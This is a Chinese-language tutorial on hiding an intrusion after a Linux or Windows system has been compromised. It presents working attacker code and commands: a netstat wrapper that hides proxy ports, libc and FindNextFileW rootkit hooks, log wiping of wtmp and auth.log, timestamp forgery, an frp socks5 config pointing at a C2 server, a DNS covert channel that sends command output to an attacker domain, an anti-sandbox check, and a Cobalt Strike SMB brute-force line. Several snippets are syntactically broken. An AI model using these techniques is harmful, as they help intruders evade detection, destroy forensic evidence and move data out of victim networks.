一、进程隐匿与伪装技术
1. 命令伪装与过滤
bash
!/bin/bash
/usr/bin/netstat $@ | grep -Ev '5000|frp|ant' 隐藏代理端口及恶意进程
bash
export PATH="/usr/local/bin:$PATH" 确保自定义脚本优先加载
2. 进程注入与内存驻留
// 劫持libc的write函数
ssize_t write(int fd, const void buf, size_t count) {
if (strstr(buf, "malicious")) return count; // 过滤日志
return orig_write(fd, buf, count);
二、文件隐匿与痕迹清除
1. 文件属性修改
bash
chattr +i /root/.ssh/authorized_keys 防止SSH密钥被覆盖
mv /usr/bin/chattr /usr/bin/cht 隐藏工具自身
bash
touch -acmr /bin/ls /tmp/malware 伪装文件时间与系统文件一致
2. 日志篡改与清理
bash
echo "" > /var/log/wtmp 清除历史登录记录
bash
sed -i '/10.1.1.119/d' /var/log/auth.log 删除代理IP相关日志
三、网络通信隐匿技术
1. Socks5代理与隧道穿透
ini
[common]
server_addr = 10.1.1.119 外网C2服务器IP
server_port = 7000
[socks5]
type = tcp
plugin = socks5
remote_port = 5000 对外暴露代理端口
bash
ssh -NfD 1080 user@jumpserver 本地1080端口映射到跳板机
2. DNS隐蔽信道
python
import dns.resolver
cmd = base64.b64encode("whoami".encode).decode
subdomain = f"{cmd}.malicious.domain.com
dns.resolver.query(subdomain, 'A') 数据封装在DNS请求中
四、高级隐匿渗透技巧
1. RootKit技术实现
BOOL WINAPI HookedFindNextFileW(HANDLE hFind, LPWIN32_FIND_DATAW lpFindFileData) {
BOOL ret = OriginalFindNextFileW(hFind, lpFindFileData);
if (strstr(lpFindFileData->cFileName, "malware")) return FALSE; // 隐藏特定文件
return ret;
2. 反沙箱与反分析技术
if (GetSystemInfo(&sysInfo) && sysInfo.dwNumberOfProcessors < 2) exit(0); // 单核环境退出
五、自动化攻击框架集成
1. Metasploit模块开发
ruby
module Auxiliary::Scanner::Ladon
def run
ladon_scan("172.22.0.0/24", "icmpscan") 调用Ladon扫描内网存活主机
end
end
2. C2框架定制(如Cobalt Strike)
js
on beacon_initial {
bshell($1, "net use 172.22.0.20IPC$ /user:admin P@ssw0rd"); // 内网SMB爆破
总结与防御建议
攻击方需综合应用代码隐匿、流量混淆、反检测技术,例如:
通过开源工具(如Ghidra逆向分析、Radare2动态调试)可深度解析上述技术原理,并针对性加固系统。
